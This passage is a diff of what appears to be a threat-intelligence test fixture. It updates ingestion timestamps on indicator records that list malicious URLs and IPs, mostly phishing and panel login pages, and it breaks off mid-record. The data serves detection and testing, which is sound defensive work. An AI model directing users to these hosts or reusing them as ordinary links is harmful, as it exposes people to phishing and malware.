@@ -2773,7 +2773,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022890500Z", + "ingested": "2021-12-14T14:57:43.118178673Z", "original": "{\"created\":\"2020-01-24T02:57:32.901Z\",\"description\":\"TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--3eb79b31-1d6d-438c-a848-24a3407f6e32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:57:32.901Z\",\"name\":\"mal_url: http://89.160.20.156/aW8bVds1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/aW8bVds1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:32.901Z\"}", "category": "threat", "type": "indicator", @@ -2824,7 +2824,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022895900Z", + "ingested": "2021-12-14T14:57:43.118179120Z", "original": "{\"created\":\"2020-01-24T02:57:32.929Z\",\"description\":\"TS ID: 55250078026; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--a050832c-db6e-49a0-8470-7a3cd8f17178\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-24T02:57:32.929Z\",\"name\":\"mal_url: http://lansome.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lansome.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:32.929Z\"}", "category": "threat", "type": "indicator", 
@@ -2876,7 +2876,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022903400Z", + "ingested": "2021-12-14T14:57:43.118179527Z", "original": "{\"created\":\"2020-01-24T02:57:49.028Z\",\"description\":\"TS ID: 55250078034; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--e88008f4-76fc-428d-831a-4b389e48b712\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T02:57:49.028Z\",\"name\":\"mal_url: http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:49.028Z\"}", "category": "threat", "type": "indicator", @@ -2928,7 +2928,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022910900Z", + "ingested": "2021-12-14T14:57:43.118180021Z", "original": "{\"created\":\"2020-01-24T02:58:03.345Z\",\"description\":\"TS ID: 55250078032; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--dafe91cf-787c-471c-9afe-f7bb20a1b93f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-01-24T02:58:03.345Z\",\"name\":\"mal_url: http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:03.345Z\"}", "category": "threat", "type": "indicator", 
@@ -2980,7 +2980,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022918400Z", + "ingested": "2021-12-14T14:57:43.118180466Z", "original": "{\"created\":\"2020-01-24T02:58:16.318Z\",\"description\":\"TS ID: 55250078031; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--232bdc34-44cb-4f41-af52-f6f1cd28818e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T02:58:16.318Z\",\"name\":\"mal_url: http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:16.318Z\"}", "category": "threat", "type": "indicator", @@ -3032,7 +3032,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022923900Z", + "ingested": "2021-12-14T14:57:43.118180955Z", "original": "{\"created\":\"2020-01-24T02:58:16.358Z\",\"description\":\"TS ID: 55250078027; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--4adabe80-3be4-401a-948a-f9724c872374\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-01-24T02:58:16.358Z\",\"name\":\"mal_url: http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:16.358Z\"}", "category": "threat", "type": "indicator", 
@@ -3083,7 +3083,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022927600Z", + "ingested": "2021-12-14T14:57:43.118181340Z", "original": "{\"created\":\"2020-01-24T02:58:32.126Z\",\"description\":\"TS ID: 55250078013; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--1d7051c0-a42b-4801-bd7f-f0abf2cc125c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:58:32.126Z\",\"name\":\"mal_url: http://suspiciousactivity.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://suspiciousactivity.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:32.126Z\"}", "category": "threat", "type": "indicator", @@ -3134,7 +3134,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022931700Z", + "ingested": "2021-12-14T14:57:43.118181881Z", "original": "{\"created\":\"2020-01-24T02:58:37.603Z\",\"description\":\"TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fb06856c-8aad-4fae-92fc-b73aae4f6dc7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:58:37.603Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:37.603Z\"}", "category": "threat", "type": "indicator", 
@@ -3185,7 +3185,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022936Z", + "ingested": "2021-12-14T14:57:43.118182582Z", "original": "{\"created\":\"2020-01-24T02:58:37.643Z\",\"description\":\"TS ID: 55250078012; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--33e674f5-a64a-48f4-9d8c-248348356135\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-01-24T02:58:37.643Z\",\"name\":\"mal_url: http://f0387550.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387550.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:37.643Z\"}", "category": "threat", "type": "indicator", @@ -3236,7 +3236,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022941300Z", + "ingested": "2021-12-14T14:57:43.118182964Z", "original": "{\"created\":\"2020-01-24T02:58:39.465Z\",\"description\":\"TS ID: 55250078018; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--6311f539-1d5d-423f-a238-d0c1dc167432\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-24T02:58:39.465Z\",\"name\":\"mal_url: http://lf4e4abf.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lf4e4abf.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:39.465Z\"}", "category": "threat", "type": "indicator", 
@@ -3281,7 +3281,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022945400Z", + "ingested": "2021-12-14T14:57:43.118183457Z", "original": "{\"created\":\"2020-01-24T02:59:02.031Z\",\"description\":\"TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--1c91f219-cfa6-44c7-a5ee-1c760489b43c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T02:59:02.031Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:02.031Z\"}", "category": "threat", "type": "indicator", @@ -3333,7 +3333,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022951800Z", + "ingested": "2021-12-14T14:57:43.118183976Z", "original": "{\"created\":\"2020-01-24T02:59:15.878Z\",\"description\":\"TS ID: 55250078010; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime\",\"id\":\"indicator--c58983e2-18fd-47b8-aab4-6c8a2e2dcb35\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-01-24T02:59:15.878Z\",\"name\":\"mal_url: http://67.215.224.101/a1/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://67.215.224.101/a1/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:15.878Z\"}", "category": "threat", "type": "indicator", 
@@ -3378,7 +3378,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022956800Z", + "ingested": "2021-12-14T14:57:43.118184419Z", "original": "{\"created\":\"2020-01-24T02:59:29.155Z\",\"description\":\"TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--1ab178a8-7991-4879-b9aa-8da49f40e92e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T02:59:29.155Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:29.155Z\"}", "category": "threat", "type": "indicator", @@ -3429,7 +3429,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022962200Z", + "ingested": "2021-12-14T14:57:43.118184799Z", "original": "{\"created\":\"2020-01-24T02:59:50.233Z\",\"description\":\"TS ID: 55250078020; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--d5bdff38-6939-4a47-8e11-b910520565c4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-24T02:59:50.233Z\",\"name\":\"mal_url: http://l60bdd58.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l60bdd58.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:50.233Z\"}", "category": "threat", "type": "indicator", 
@@ -3481,7 +3481,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022966700Z", + "ingested": "2021-12-14T14:57:43.118185258Z", "original": "{\"created\":\"2020-01-24T02:59:50.255Z\",\"description\":\"TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--1be74977-5aa6-4175-99dd-32b54863a06b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-25\"],\"modified\":\"2020-01-24T02:59:50.255Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.azma/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.azma/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:50.255Z\"}", "category": "threat", "type": "indicator", @@ -3532,7 +3532,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022970800Z", + "ingested": "2021-12-14T14:57:43.118185645Z", "original": "{\"created\":\"2020-01-24T02:59:52.536Z\",\"description\":\"TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--eacc25ce-584c-4b40-98ab-7935dabd5cb1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-24T02:59:52.536Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:52.536Z\"}", "category": "threat", "type": "indicator", 
@@ -3583,7 +3583,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022975Z", + "ingested": "2021-12-14T14:57:43.118186078Z", "original": "{\"created\":\"2020-01-24T02:59:54.784Z\",\"description\":\"TS ID: 55250078025; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--504f4011-eaea-4921-aad5-f102bef7c798\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-24T02:59:54.784Z\",\"name\":\"mal_url: http://trotdeiman.ga/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trotdeiman.ga/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:54.784Z\"}", "category": "threat", "type": "indicator", @@ -3628,7 +3628,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022978700Z", + "ingested": "2021-12-14T14:57:43.118186472Z", "original": "{\"created\":\"2020-01-24T02:59:54.815Z\",\"description\":\"TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--e3ffb953-6c59-461a-8242-0d26c2b5c358\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:59:54.815Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:54.815Z\"}", "category": "threat", "type": "indicator", 
@@ -3673,7 +3673,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022983900Z", + "ingested": "2021-12-14T14:57:43.118187016Z", "original": "{\"created\":\"2020-01-24T03:00:01.726Z\",\"description\":\"TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--3a47ad46-930d-4ced-b0e7-dc9d0776153e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T03:00:01.726Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:01.726Z\"}", "category": "threat", "type": "indicator", @@ -3725,7 +3725,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022991700Z", + "ingested": "2021-12-14T14:57:43.118187447Z", "original": "{\"created\":\"2020-01-24T03:00:01.762Z\",\"description\":\"TS ID: 55250078011; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--0e10924c-745c-4a58-8e27-ab3a6bacd666\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T03:00:01.762Z\",\"name\":\"mal_url: http://tavim.org/includes/firmino/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tavim.org/includes/firmino/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:01.762Z\"}", "category": "threat", "type": "indicator", 
@@ -3776,7 +3776,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022999400Z", + "ingested": "2021-12-14T14:57:43.118188008Z", "original": "{\"created\":\"2020-01-24T03:00:10.928Z\",\"description\":\"TS ID: 55250078015; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--c3fb816a-cc3b-4442-be4d-d62113ae5168\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-24T03:00:10.928Z\",\"name\":\"mal_url: http://onlinesecuritycenter.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://onlinesecuritycenter.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:10.928Z\"}", "category": "threat", "type": "indicator", @@ -3828,7 +3828,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023006700Z", + "ingested": "2021-12-14T14:57:43.118188508Z", "original": "{\"created\":\"2020-01-24T03:00:20.166Z\",\"description\":\"TS ID: 55250078029; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--9159e46d-f3a4-464b-ac68-8beaf87e1a8f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T03:00:20.166Z\",\"name\":\"mal_url: http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:20.166Z\"}", "category": "threat", "type": "indicator", 
@@ -3879,7 +3879,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023014300Z", + "ingested": "2021-12-14T14:57:43.118189004Z", "original": "{\"created\":\"2020-01-24T03:00:24.048Z\",\"description\":\"TS ID: 55250078016; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fefa8e76-ae0f-41ab-84e7-ea43ab055573\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-24T03:00:24.048Z\",\"name\":\"mal_url: http://jumbajumbadun.fun/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jumbajumbadun.fun/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:24.048Z\"}", "category": "threat", "type": "indicator", @@ -3931,7 +3931,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023021700Z", + "ingested": "2021-12-14T14:57:43.118189442Z", "original": "{\"created\":\"2020-01-24T03:00:55.816Z\",\"description\":\"TS ID: 55250078024; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--6a76fa89-4d5f-40d0-9b03-671bdb2d5b4b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T03:00:55.816Z\",\"name\":\"mal_url: http://tavim.org/includes/salah/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tavim.org/includes/salah/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:55.816Z\"}", "category": "threat", "type": "indicator", 
@@ -3982,7 +3982,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023026900Z", + "ingested": "2021-12-14T14:57:43.118189890Z", "original": "{\"created\":\"2020-01-24T03:01:10.501Z\",\"description\":\"TS ID: 55250078022; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--21055dfd-d0cb-42ec-93bd-ffaeadd11d80\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-24T03:01:10.501Z\",\"name\":\"mal_url: http://l0c23205.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l0c23205.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:10.501Z\"}", "category": "threat", "type": "indicator", @@ -4033,7 +4033,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023032900Z", + "ingested": "2021-12-14T14:57:43.118190420Z", "original": "{\"created\":\"2020-01-24T03:01:10.518Z\",\"description\":\"TS ID: 55250078021; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--7471a595-e8b0-4c41-be4c-0a3e55675630\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T03:01:10.518Z\",\"name\":\"mal_url: http://l535e9e5.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l535e9e5.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:10.518Z\"}", "category": "threat", "type": "indicator", 
@@ -4078,7 +4078,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023040600Z", + "ingested": "2021-12-14T14:57:43.118190807Z", "original": "{\"created\":\"2020-01-24T03:01:14.843Z\",\"description\":\"TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--ead1e7e5-fdb3-47c2-9476-aa82741c038e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-24T03:01:14.843Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:14.843Z\"}", "category": "threat", "type": "indicator", @@ -4129,7 +4129,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023048Z", + "ingested": "2021-12-14T14:57:43.118191190Z", "original": "{\"created\":\"2020-01-25T02:57:12.699Z\",\"description\":\"TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--b0aee6bf-32f4-4f65-8de6-f65e04e92b15\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-25T02:57:12.699Z\",\"name\":\"mal_url: http://89.160.20.156/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:12.699Z\"}", "category": "threat", "type": "indicator", 
@@ -4180,7 +4180,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023054600Z", + "ingested": "2021-12-14T14:57:43.118191696Z", "original": "{\"created\":\"2020-01-25T02:57:28.034Z\",\"description\":\"TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--54afbceb-72f3-484e-aee4-904f77beeff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-25T02:57:28.034Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:28.034Z\"}", "category": "threat", "type": "indicator", @@ -4232,7 +4232,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023058200Z", + "ingested": "2021-12-14T14:57:43.118192328Z", "original": "{\"created\":\"2020-01-25T02:57:38.187Z\",\"description\":\"TS ID: 55253484356; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--da030e10-af9f-462d-bda8-33abb223e950\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:57:38.187Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/scan/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/scan/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:38.187Z\"}", "category": "threat", "type": "indicator", 
@@ -4283,7 +4283,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023062200Z", + "ingested": "2021-12-14T14:57:43.118192773Z", "original": "{\"created\":\"2020-01-25T02:57:38.214Z\",\"description\":\"TS ID: 55253484343; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--d38e051a-bc5b-4723-884a-65e017d98299\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-01-25T02:57:38.214Z\",\"name\":\"mal_url: http://f0391587.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391587.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:38.214Z\"}", "category": "threat", "type": "indicator", @@ -4335,7 +4335,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023067600Z", + "ingested": "2021-12-14T14:57:43.118193163Z", "original": "{\"created\":\"2020-01-25T02:57:47.281Z\",\"description\":\"TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--46491826-6ba1-4217-a35e-1eb0081a9e6a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-25T02:57:47.281Z\",\"name\":\"mal_url: http://89.160.20.156:8080/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156:8080/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:47.281Z\"}", "category": "threat", "type": "indicator", 
@@ -4386,7 +4386,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023075200Z", + "ingested": "2021-12-14T14:57:43.118193666Z", "original": "{\"created\":\"2020-01-25T02:57:51.296Z\",\"description\":\"TS ID: 55253484342; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--b9715fd5-b89a-4859-b19f-55e052709227\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-01-25T02:57:51.296Z\",\"name\":\"mal_url: http://f0393086.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0393086.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:51.296Z\"}", "category": "threat", "type": "indicator", @@ -4438,7 +4438,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023079200Z", + "ingested": "2021-12-14T14:57:43.118194111Z", "original": "{\"created\":\"2020-01-25T02:57:56.007Z\",\"description\":\"TS ID: 55253484363; iType: mal_url; State: active; Org: ServerMania; Source: 